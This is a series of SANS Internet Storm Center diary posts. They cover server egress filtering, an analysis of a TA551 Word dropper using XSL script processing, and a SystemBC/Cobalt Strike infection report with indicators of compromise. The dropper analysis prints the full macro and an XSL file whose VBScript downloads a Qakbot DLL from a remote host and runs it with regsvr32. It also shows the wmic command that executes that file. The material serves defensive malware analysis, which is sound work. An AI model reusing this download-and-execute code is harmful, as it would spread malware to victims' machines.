I know these first two are simple - but in your organization, do you have a list of software that's running on each of your servers?  With the inbound listening ports?  How about outbound ports that connect to known internet hosts?
This list should be fairly simple to create - figure a few minutes to an hour or so for each application to phrase it all in terms that you can make firewall rules from.

CC12:
Now, for each server make an egress filter "paragraph" for your internet-facing firewalls.  Give it permission to reach out to its list of known hosts and protocols.  It's rare that you will have hosts that need to reach out to the entire internet - email servers on the SMTP ports are the only ones that immediately come to mind, and we're seeing fewer and fewer of those on premises these days.
Also CC12:
So now you have the list of what's allowed for that server.  Add the line "permit <servername> any ip log" - in other words, permit everything else, but log it to syslog.  Monitor that server's triggered logs for a defined period of time (a day or so is usually plenty).  Be sure to trigger any "update from the vendor" events that might be part of any installed products.  After that period of time, change that line to "deny <servername> any ip log", so now we're denying outbound packets from that server, but still logging them.
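The exact log format depends on your firewall, but the "monitor for a day, then turn the results into permit lines" step is easy to automate. A minimal Python sketch (the space-delimited log format here is hypothetical - adjust the field positions to whatever your firewall actually exports) that summarizes what a server talked to during the logging period:

#!/usr/bin/env python3
# Summarize outbound destinations seen in an exported firewall log so they
# can be turned into "permit" lines for a server's egress stanza.
# Hypothetical input format: one hit per line, "SRC_IP DST_IP DST_PORT PROTO";
# adjust the field indexes to match your firewall's actual export.
import sys
from collections import Counter

destinations = Counter()
with open(sys.argv[1]) as logfile:
    for line in logfile:
        fields = line.split()
        if len(fields) < 4:
            continue
        src, dst, port, proto = fields[:4]
        destinations[(src, dst, port, proto)] += 1

# Each unique tuple is a candidate "permit" entry; anything unexpected is
# something to investigate before you flip the stanza to "deny ... log".
for (src, dst, port, proto), hits in destinations.most_common():
    print("{:8d}  {} -> {} {}/{}".format(hits, src, dst, proto, port))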

What about my Linux servers you ask?  Don't they need all of GitHub and everything else in order to update?  No, no they do not.  To get the list of repos that your server reaches out to for upgrades:

sudo apt-get update
Hit:1 http://us.archive.ubuntu.com/ubuntu focal InRelease
Hit:2 http://security.ubuntu.com/ubuntu focal-security InRelease
Hit:3 http://us.archive.ubuntu.com/ubuntu focal-updates InRelease
Hit:4 http://us.archive.ubuntu.com/ubuntu focal-backports InRelease
Reading package lists... Done

robv@ubuntu:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb
deb http://us.archive.ubuntu.com/ubuntu/ focal main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal universe
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates universe
deb http://us.archive.ubuntu.com/ubuntu/ focal multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu focal-security main restricted
deb http://security.ubuntu.com/ubuntu focal-security universe
deb http://security.ubuntu.com/ubuntu focal-security multiverse

(this lists all sources, filters out comment lines, and looking for "deb" nicely filters out blank lines)

Refine this list further to just get the unique destinations:

robv@ubuntu:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb | cut -d " " -f 2 | sort | uniq
http://security.ubuntu.com/ubuntu
http://us.archive.ubuntu.com/ubuntu/

So for a stock Ubuntu server, the answer is two - you need access to just two hosts to do a "direct from the internet" update. Your mileage may vary depending on your configuration though.
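If you're collecting this across a whole fleet rather than one box, the same extraction is easy to script. Here's a minimal Python sketch of the shell pipeline above (it prints just the repository hostnames, which is what you'd put in a firewall object group):

#!/usr/bin/env python3
# Same logic as the shell pipeline above: list the unique repository hosts
# an apt-based server needs to reach for updates.
from urllib.parse import urlparse

repo_hosts = set()
with open("/etc/apt/sources.list") as sources:
    for line in sources:
        line = line.strip()
        if not line.startswith("deb"):
            continue            # skip comments and blank lines
        # format: deb [options] URI suite [components...]
        uris = [field for field in line.split() if field.startswith("http")]
        if uris:
            repo_hosts.add(urlparse(uris[0]).netloc)

for host in sorted(repo_hosts):
    print(host)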

How about Windows?  For a standard application server, the answer usually is NONE.  You likely have an internal WSUS, SCCM or SCOM server right?  That takes care of updates.  Unless you are sending mail with that server (which can be limited to just tcp/25, and most firewalls will restrict to valid SMTP), likely your server is providing a service, not reaching out to anything.   Even if the server does reach out to arbitrary servers, you can likely restrict it to specific destination hosts, subnets, protocols or countries.

With a quick inventory, creating a quick "stanza" for each server's outbound permissions goes pretty quickly.  For each line, you'll be able to choose a logging action of "log", "alert" or "don't log".  Think about these choices carefully, and select the "don't log" option at your peril.  Your last line for each server's outbound stanza should almost without fail be your firewall's equivalent of "deny ip <servername> any log"

Be sure that your server change control procedures include a "after this change, does the application or server need any additional (or fewer) internet accesses?"

The fallout from this?  Surprisingly little.  

  • If you have administrators who RDP to servers, then use the browser on that server for support purposes, this will no longer work for them.  THIS IS A GOOD THING.  Browse to potentially untrusted sites from your workstation, not the servers in the server VLAN!
  • As you add or remove software, there's some firewall rule maintenance involved.  If you skip that step, then things will break when you implement them on the servers.  This "tie the firewall to the server functions" step is something we all should have been doing all along.
  • But I have servers in the cloud you say?  It's even easier to control outbound access in any of the major clouds, either with native tools or by implementing your <insert vendor here> cloud based or virtual firewall.  If you haven't been focused on firewall functions for your cloud instance, you should drop your existing projects and focus on that for a week or so (seriously, not joking).
  • On the plus side, you'll have started down the path of implementing the Critical Controls.  Take a closer look at them if you haven't already, there's only good things to find there :-)
  • Also on the plus side, you'll know which IPs, subnets and domains your purchased applications reach out to
  • Just as important, or even moreso - you'll have that same information for your in-house applications.
  • Lastly, if any of your hosts or applications reach out to a new IP, it's going to be blocked and will raise an alert.  If it ends up being reverse-shell or C&C traffic, you can definitively say that you blocked that traffic.  (score!)
  • Lastly-lastly - treat denied server packets as security incidents.  Make 100% sure that denying this packet breaks something before allowing it.  If you just add an "allow" rule for all denied packets, then you'll at some point just be enabling malware to do its best.

For most organizations with less than a hundred server VMs, you can turn this into a "hour or two per day" project and get it done in a month or so.

Will this catch everything?  No - you still need to address workstation egress, but that's a do-able thing too (https://isc.sans.edu/forums/diary/Egress+Filtering+What+do+we+have+a+bird+problem/18379/).  Would this have caught the Solarwinds Orion code in your environment?  Yes, parts of it - in most shops the Orion server does not need internet access at all (if you don't depend on the application's auto-update process) - even with that, it's a short "allow" list.  And if the reaction is to treat denied packets seriously, you'd have caught it well before it hit the news (this was a **lengthy** incident).  The fact that nobody caught it in all that time really means that we're still treating outbound traffic with some dangerous mindsets: "we trust our users" (to not make mistakes), "we trust our applications" (to not have malware) and "we trust our server admins" (to not do dumb stuff like browse from a server, or check their email while on a server).  If you read these with the text in the brackets, I'm hoping you'll agree that these are mindsets we should set aside - maybe we should have done this in the early 2000's!  This may seem like an over-simplification, but really it's not - this approach really does work.

If you've caught anything good with a basic egress filter, please share using our comment form (NDA permitting of course).

Referenced Critical Controls:

CC1: Inventory and Control of Hardware Assets (all of it, if you haven't done this start with your server VLAN)
CC2: Inventory and Control of Software Assets (again, all of it, and again, start with your server VLAN for this)
CC7.6 Log all URL requests from each of the organization's systems, whether on-site or a mobile device, in order to identify potentially malicious activity and assist incident handlers with identifying potentially compromised systems.
CC9.1 Associate active ports, services, and protocols to the hardware assets in the asset inventory.
CC9.4 Apply host-based firewalls or port-filtering tools on end systems, with a default-deny rule that drops all traffic except those services and ports that are explicitly allowed.
CC12.4 Deny communication over unauthorized TCP or UDP ports or application traffic to ensure that only authorized protocols are allowed to cross the network boundary in or out of the network at each of the organization's network boundaries.
CC12.5 Configure monitoring systems to record network packets passing through the boundary at each of the organization's network boundaries.

 

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Tuesday, February 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7354, (Tue, Feb 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New Example of XSL Script Processing aka "Mitre T1220", (Tue, Feb 2nd)


Last week, Brad posted a diary about TA551[1]. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic, so I decided to have a look at the macro - not because the code is heavily obfuscated, but because data is spread across different locations in the Word document.

The sample was delivered through a classic phishing email with a password-protected archive. It's a file called ‘facts_01.28.2021.doc’ (SHA256:dcc5eb5dac75a421724fd8b3fa397319b21d09e22bc97cee1f851ef73c9e3354) and unknown on VT at this time.

It does indeed contain a macro:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc
A: word/vbaProject.bin
 A1:       539 'PROJECT'
 A2:        89 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3687 'VBA/_VBA_PROJECT'
 A5:      2146 'VBA/__SRP_0'
 A6:       198 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    1165 'VBA/a7JUT'
A10: M   10838 'VBA/aBJwC'
A11:       884 'VBA/dir'
A12: m    1174 'VBA/frm'
A13:        97 'frm/\x01CompObj'
A14:       286 'frm/\x03VBFrame'
A15:       170 'frm/f'
A16:      1580 'frm/o'

If looking at "M" flags in the oledump output is a key point, it's always good to have a look at all the streams. A first interesting observation is the presence of a user form in the document (see the ‘frm’ in streams 13 to 16 combined with 'm' in stream 12). 'frm' is the name that was given to the author. This can be verified by checking the document in a sandbox:

WARNING: Don't do this on a regular host!

The user form contains three elements (text boxes). Now let's have a look at the document. The macros are polluted with comments, which can be cleaned up by filtering them out.
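If you prefer to script the comment-stripping rather than piping oledump through grep as shown below, the oletools package offers a programmatic interface. A minimal sketch (assuming oletools is installed):

#!/usr/bin/env python3
# Extract the VBA macros from the maldoc and drop comment-only lines -
# the scripted equivalent of the oledump | grep -v "' " approach below.
# Assumes oletools is installed (pip install oletools).
from oletools.olevba import VBA_Parser

vba = VBA_Parser("facts_01.28.2021.doc")
for filename, stream_path, vba_filename, code in vba.extract_macros():
    print("----- {} ({}) -----".format(stream_path, vba_filename))
    for line in code.splitlines():
        if not line.strip().startswith("'"):   # skip comment-only lines
            print(line)
vba.close()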

Stream #9 is not interesting, it just contains the AutoOpen() function which calls the real entry point:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 9 -v | grep -v "' "
Attribute VB_Name = "a7JUT"
Sub AutoOpen()
Call ahjAvX
End Sub

The real interesting one is located in the stream 10:

remnux@remnux:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 10 -v | grep -v "' "
Attribute VB_Name = "aBJwC"
Function ajC1ui(auTqHQ)
End Function
Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function
Function ayaXI(aa5xD, aqk4PA)
Dim aoTA6S As String
aoTA6S = Chr(33 + 1)
ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function
Function acf8Y()
acf8Y = "L"
End Function
Sub ahjAvX()
axfO6 = Trim(frm.textbox1.text)
aa6tSY = Trim(frm.textbox2.text)
aqk4PA = aa6tSY & "xs" & acf8Y
aa5xD = aa6tSY & "com"
a6AyZu = Trim(frm.textbox3.text)
aYlC14 aqk4PA, axfO6
FileCopy a6AyZu, aa5xD
CreateObject("wscript.shell").exec ayaXI(aa5xD, aqk4PA)
End Sub
Sub aYlC14(aFp297, axfO6)
Open aFp297 For Output As #1
Print #1, axfO6
Close #1
End Sub

ahjAvX() is called from AutoOpen() and starts by extracting the values of the user form elements: frm.textbox[1-3].text

The element #3 contains “c:\windows\system32\wbem\wmic.exe”
Element #2 contains "c:\programdata\hello." (note the dot at the end)
And element #1 contains what looks to be some XML code.

Before checking the XML code, let's deobfuscate the macro:

ahjAvX() reconstructs some strings and dumps the XML payload into an XSL file by calling aYlC14(). Then, a copy of wmic.exe (the WMI client) is placed in "c:\programdata\hello.com". Before spawning a shell, more data is extracted from the document via atZhQ():

Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function

The document comments field contains the string "pagefile get /format:"

By the way, did you see the author's name?

With the extracted comments field, here is the function that executes the XSL file:

Function ayaXI(aa5xD, aqk4PA)
  Dim aoTA6S As String
  aoTA6S = Chr(33 + 1)
  ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function

The reconstructed command line is:

c:\programdata\hello.com pagefile get /format: "c:\programdata\hello.xsl"

We have here a perfect example of a dropper that dumps an XSL file on the disk and executes it. This technique is referred to as T1220 by MITRE[2]. Let's now have a look at the XSL file:

<?xml version='1.0'?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="https://microsoft.com/xxx">
<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
Function aOLsw()
  Set xmlhttp = CreateObject("msxml2.xmlhttp")
  xmlhttp.open "GET", "http://fbfurnace6.com/assets/4621f42aad9738c0992/e93f49079ac08560/67311dcc4b7a6/shaz10?pr=5dc7155&rccks=4cc00761&kp=d909e4b6e097ed", false.
  xmlhttp.send
  If xmlhttp.Status = 200 Then
    Set stream = CreateObject("adodb.stream")
    stream.Open
    stream.Type = 1
    stream.Write xmlhttp.ResponseBody
    stream.Position = 0
    stream.SaveToFile "c:\programdata\41401.jpg", 2
    stream.Close
  End if
End Function
]]>

</msxsl:script>
<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
]]>
</msxsl:script>

<msxsl:script language="VBScript" implements-prefix="user">
<![CDATA[
Function awyXdU(aLYgv, aCdvO, atYdl)
  Call aOLsw
  Set aKLoby = CreateObject("wscript.shell")
  With aKLoby
    .exec "regsvr32 c:\programdata\41401.jpg"
  End With
  awyXdU = 1
End Function
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:awyXdU('', '', '')"/>
</xsl:template>
</xsl:stylesheet>

The function awyXdU() is the entry point of this XSL file. It calls aOLsw() to download the malicious Qakbot DLL, dumps it on the disk, and executes it with regsvr32. XSL files are not new, but it has been a while since I last spotted one. Didier already mentioned them in a diary back in 2019[3].

[1] https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/
[2] https://attack.mitre.org/techniques/T1220/
[3] https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Excel spreadsheets push SystemBC malware, (Wed, Feb 3rd)


Introduction

On Monday 2021-02-01, a fellow researcher posted an Excel spreadsheet to the Hatching Triage sandbox.  This Excel spreadsheet has a malicious macro, and it uses an updated GlobalSign template that I hadn't noticed before (link for the sample).

This Excel spreadsheet pushed what might be SystemBC malware when I tested it in my lab environment on Monday 2021-02-01.  My lab host was part of an Active Directory (AD) environment, and I also saw Cobalt Strike as follow-up activity from this infection.

Today's diary reviews this specific instance of (what I think is) SystemBC and Cobalt Strike activity from Monday 2021-02-01.


Shown above:  Flow chart from the SystemBC infection on Monday 2021-02-01.

Infection Path

I didn't know where these spreadsheets were coming from when I investigated this activity on Monday 2021-02-01.  By Tuesday 2021-02-02, several samples had come into VirusTotal showing at least 20 spreadsheets that were contained in zip archives.  These appear to have been distributed as email attachments.  Unfortunately, I couldn't find any emails submitted to VirusTotal yet that contained one of the zip archives.


Shown above:  Screenshot from one of the spreadsheets.

Spreadsheet macro grabs SystemBC malware

Enabling macros on a vulnerable Windows host caused HTTPS traffic to grab a Windows executable (EXE) file for SystemBC malware.  This EXE was stored and run from a new directory path created under the C:\ drive as shown below.


Shown above: SystemBC malware saved to the infected Windows host.

This EXE file was made persistent on the infected host through a scheduled task.


Shown above:  Scheduled task to keep the malware persistent.

SystemBC post-infection traffic

The first post-infection traffic caused by SystemBC was TCP traffic to 109.234.39[.]169 over port 4001 as shown below.


Shown above:  SystemBC traffic over TCP port 4001.

Next was HTTP traffic to the same IP address over TCP port 80 that returned obfuscated text containing code to start the Cobalt Strike activity.


Shown above:  HTTP traffic caused by SystemBC that returned code for Cobalt Strike.

Cobalt Strike traffic

Cobalt Strike activity consisted of HTTPS traffic and DNS activity focused on the domain fastonent[.]com.


Shown above:  Cobalt Strike activity from the infection.


Shown above:  Alerts from the traffic using Sguil in Security Onion with Suricata and the ETPRO ruleset.

Indicators of Compromise (IOCs)

SHA256 HASHES OF 20 ZIP ARCHIVES WITH THE 20 EXCEL FILES THEY CONTAIN:

- 31a04fe64502bfe6f73971f9de9736402dd9a21a66d41d3a4ecea5ee18852f1c  documentation-82.zip
- a54b331832d61ae4e5a2ec32c46830df4aac4b26fe877956d2715bfb46b6cb97  Document21467.xls

- ce02ed48d9ab12dfe2202c16f1f272f75e5b1c0b64e48e385ca71608cb686fc8  documentation-17.zip
- 62f1ef07f7bab2ad9abf7aeb53e3a5632527a1839c3364fbaebadd78d6c18f4e  Document13160.xls

- 4dfb0bb69a07f1cd7b46198b5edf8afebd0cdd02f27eb2c687447f692625fb9f  contract-86.zip
- 59bbcecd3b1670afc5430e3b31377f24da24f4e755b7c563a842ce4e325aa61a  Document24071.xls

- c3a38df6f4864d32c10e8ecf063e18cba56c3b1add3404634ea20ea109198620  agreement-92.zip
- 8ef917da85afcc5f7bfe9cc2afd29f44a7f0cda5ba0249b50ef448d547007461  Document1525.xls

- 3a181036cdc46e088f1cb98acd06062d32a8a11a8ef65fe7544bb22a2fd5c56e  information-94.zip
- 387bdfedc306e087d8ceceb1f1f8f7a6b3c32110ca3d7273eb01e474349d1974  Document10668.xls

- 244625f6627cadadb7faf8a6b526e91aee4f5c1cadfa1c0d4fb996f4cc60a5ae  documentation-18.zip
- 17ed4dc4369a90d2e24f1ab0fa1eeb6fca61f77b183499c47e5cfb9ce12130fb  Document7833.xls

- cca4a3c8af9b549b445b7e2bcb2d45b95982890b6ed3b62fc882f0478f512b2f  agreement-44.zip
- f682f0756ec96d262ae4c48083d720657685d9b56278bd07b2656f3b33be985e  Document1047.xls

- dcff925d51e90586eb624f249e56b6abb7026b364fab84dcfcf44025e84ff7d9  DOCUMENT-30.zip
- 2e726c5a27e04633d407e13bd242ae71865eef13ac78bf9068e1200823e5ea81  Document15758.xls

- dc5a3675455d9486e7aa8aaf2463b69ad03c508375eb99b6fb3039d914677a9f  information-94.zip
- 6c0ef43c1f8b4425d034a46812903b8a6345ae24e556e61e37c0f14eba8c8d2e  Document15979.xls

- 7d1602138a26c0524b32570f3fb292fd5a7efbc5ed53ae260d7b7f3652a78969  documentation-83.zip
- b4107daacbbfac1b9bc9b3fa4e34a8d87037fa2c958db9d6d7df52380f15a1d1  Document16000.xls

- 0fb4d8ac3cdef038bf53c8f4269eef5845704a9e962b7609fd93a9f08cc2fab1  documentation-48.zip
- ff483bbb98d02d1e071d6f0e8f3a3c1706c246db71221455b29f4e54b0c4ef2f  Document29060.xls

- 0cf4fff7f96cf695d3476e7dc66794d067acafbd2980f69526b874fc5b4c08be  docs-62.zip
- 441f076519f0bdc04d110b4fa73dbafa3b667825ceab6d4099e36714bd1d7213  Document5804.xls

- 056911f208c9b475020627b83c8bf3a0151e30ec7f71113cf75abb950a431efc  answer-46.zip
- 795a5d5c57dac1703c6b4bab9507d1c662180716b4afa89c261aa3bb6d164e2f  Document10660.xls

- 31901336fdfae4fdeac46b937a059c618d5ba3e04d06bb8e95108a307e2c6d94  DOCUMENT-74.zip
- b2aa3ee1cc617f90e92664969a0856d98a97c727edd7c81ef83c038a34a432d5  Document4083.xls

- e06ee4e0bbe581edc39aecaab76e3fa12a53cb971ec0c106644703b376f5ed24  reaction-32.zip
- a3ce1043a7791b73fe14d7c29377467fd64df3b3b464c48a22a6d3bd2f7786aa  Document18681.xls

41 OTHER EXCEL FILES WITH THE SAME DOCUMENT TEMPLATE:

- 044494acb6d781e6cc3b9a837b7ebca1e933080fe384a874f5eb9cca1ea76a55  DOCUMENT-99.xls
- 071809d68b777cae171284c2cc289b455a778b1f054cd0f244cf0fb6053dae2d  documentation-47.xls
- 0e094197fca1947eb189006ddeb7d6ad9e5d1f58229e929bc0359887ed8a667d  agreement-84.xls
- 134a5bfe06f87ace41e0e2fb6f503dca0d521cb188a0c06c1c4bc734ad01e894  Document5201.xls
- 13ef189260cd344e61a0ad5907c5e695372b00fe1f5d5b2b3e389ad2b99b85e4  documentation-32.xls
- 17fb4271ab9113a155c091c7d7bd590610da87e986ccf5962aa7fc4b82060574  SG_information-24.xls
- 19065d8aa76ba67d100d5cb429a8b147c61060cc49905529d982042a55caceef  agreement-26.xls
- 1b63ff13d507f9d88d03e96c3ef86c7531da58348f336bc00bf2d2a2e378fd90  documentation-63.xls
- 1d8fd79934dc9e71562e50c042f9fa78a93fa2991d98c33e0b6ab20c0b522d5a  required-47.xls
- 1e295b33d36dee63930728349be8d4c7b8e5b52f98e6a8d9ca50929c8a3c9fb1  contract-52.xls
- 2156a9f3d87d3df1cee3f815f609c2a3dc2757717ff60954683c34794e52b104  document-85.xls
- 21db2f562b9182a3fcdb0fce8c745b477be02b4a423a627cddf6a1c244b6c415  DOCUMENT-64.xls
- 2f66e8d84e87811feaf73e30b08be0ad6381271ddfb5071556bd26cd3db2c3f4  documents-74.xls
- 32452e930a813f41a24dc579a08e8dde1801603797d527ce1385ad414b00e676  Document9330.xls
- 32a904d301e8a30b7bd70804b905dd7b858b761979f3344bc2ec3bff0cb6d703  DOCUMENT-64.xls
- 3dcd7897ad927f4b2b860010963e02903bc68a2c0c86abb1a27b8cbaab2fa9b6  document-91.xls
- 418460bf69c01e47cbe261d7f7312475cda4305860fbbe3d3e6639b9adb78de5  Document8107.xls
- 49cb79f8547c9c94a7ab6642ba1c40fcd036625f71845f2c6203d76c5f7f46fb  documents-44.xls
- 4af6e8805273ca9b3dea793bd712ed785ea5c5ed9e387cb8ab5059a4f364a303  docs-49.xls
- 584c2aab3fe9e1ec9f9dffecbd32e6af8b6b3fa3141c7ddf845763cbf14a82eb  DOCUMENT-30.xls
- 5cecb7e104e73aa9916a7154a3004d1a71c59c8f473d693f3b285b2fd473e454  documentation-66.xls
- 669de92b909247d676daa6bab3b3ae5be4fbec2e77f66915267f032c1d7eb71a  agreement-50.xls
- 6bf9612a2b8288d55b47648f9ad9ee80cca5058ced5fb77254e57f9ff2d701d3  contract-38.xls
- 6df34ffeffb9cc5def3c424cd8bb0f90ab921be24efd1f8fe52ea6c13e700334  data-65.xls
- 8072f20dd769519a621255307b03e85dca2fe227f48486b0aacc41903ab3bfdf  Document12611.xls
- 8eb429c24872a501fafc783e8a0fcc53e0ebb5cc8ec4f2310fc10102b1d23a27  contract-90.xls
- 908cb8f6f39b9c310d8df54bddf667d23b0851bbf90b21ca89ea69d211f2c402  Document21461.xls
- 9519a0631804d18f95d4c3239df5e5ea56b8e5a890b73c889a58d6469958eb71  Document11622.xls
- 952ec18a6dc949ebd335f5eabed756d0f562aa3853fe9384dc0eded0de5f843b  required-36.xls
- a274a08d84958666b6c94e1a6fc3b676aca387544a4218c8473e1a9a72124532  documentation-45.xls
- a7b362864724ccb5cba416ff45b4e137f22f8fed4492b5521e369026107031b2  Document9470.xls
- ab9b97d0d17b2434d2cfc66106ae07b903271ba603be1314b742338c23cce20c  docs-72.xls
- c4d745576b47b6dd79a9d92cda7dbe60c2cda7d8960a07e33692e6e71f8e5eb3  document-78.xls
- c8fd542a9b500ada7afbff26b6c11dd2ab22aaefd30ef7a999410ee20d2fb043  answer-69.xls
- d0c96aacb07629b9d97641a0022b50827f73d86a34fa4929b126f398cf4cf486  Document21265.xls
- d3145f4f7b1c62f9a1937aa9e968da8b52ff4fde83c0dba3152567b2b65d809a  documentation-49.xls
- d4e372014a40821f10780fcc12c6b5a1cdf4740738a0769e78f06dd10b6ec53f  daret.xls
- d85eb8e5c39d7681155e39602ce30e0c3793b4513f1038e48334296db945e02d  documentation-29.xls
- e26ab2d6cff95ba776ec6e7beb8c70f2e4d79467b71153ddb36177cb2b2a1273  Document4677.xls
- e64d605e857900a07c16e22e288c37355e4ebd6021898268ab5dded5c8c4efca  documentation-99.xls
- f5e2351ff528c574dc23c7ef48ddac42546c86d77c28333b25112a9efbfb9d93  Document18108.xls

AT LEAST 7 URLS GENERATED BY EXCEL MACROS FOR A MALWARE PAYLOAD:

- hxxps://alnujaifi-portal[.]com/ds/3101.gif
- hxxps://clinica-cristal[.]com/ds/3101.gif
- hxxps://eyeqoptical[.]ca/ds/3101.gif
- hxxps://gbhtrade.com[.]br/ds/3101.gif
- hxxps://newstimeurdu[.]com/ds/3101.gif
- hxxps://remacon[.]net/ds/3101.gif
- hxxps://skconstruction[.]info/ds/3101.gif

MALWARE PAYLOAD EXAMPLE (SYSTEMBC EXE):

- SHA256 hash: 61499704920ee633ffb2baab36eb8eb70d5e0426bca584f9a4a872e4b930c417
- File size: 243,200 bytes
- File location: C:\BlockSt\Uptqeodk\wineditor.exe

SYSTEMBC TRAFFIC:

- 109.234.39.169 over TCP port 4001 - encoded/encrypted data
- 109.234.39.159 over TCP port 80 - GET /systembc/[24 ASCII characters representing hex string].txt

COBALT STRIKE ACTIVITY:

- 192.169.6.8 over TCP port 443 - no domain - HTTPS traffic
- 192.169.6.8 over TCP port 443 - fastonent[.]com - HTTPS traffic
- 192.169.6.8 over TCP port 8080 - fastonent[.]com - HTTPS traffic
- DNS queries/responses for various domains ending with .dns.fastonent[.]com


Final words

I'm not 100 percent sure this malware is SystemBC, but HTTP traffic caused by the EXE has /systembc/ in the URL, so I'm calling it SystemBC until someone identifies it as another malware family.

When I ran the spreadsheet on a stand-alone host, I only saw SystemBC traffic over TCP port 4001.  I didn't see the Cobalt Strike traffic until I infected one of my lab hosts within an AD environment.  This reflects a trend I've noticed with at least one other malware family (Hancitor), where Cobalt Strike doesn't appear unless the infected host is running in an AD environment.

A pcap of the infection traffic and malware from the infected Windows host can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Wednesday, February 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7356, (Wed, Feb 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.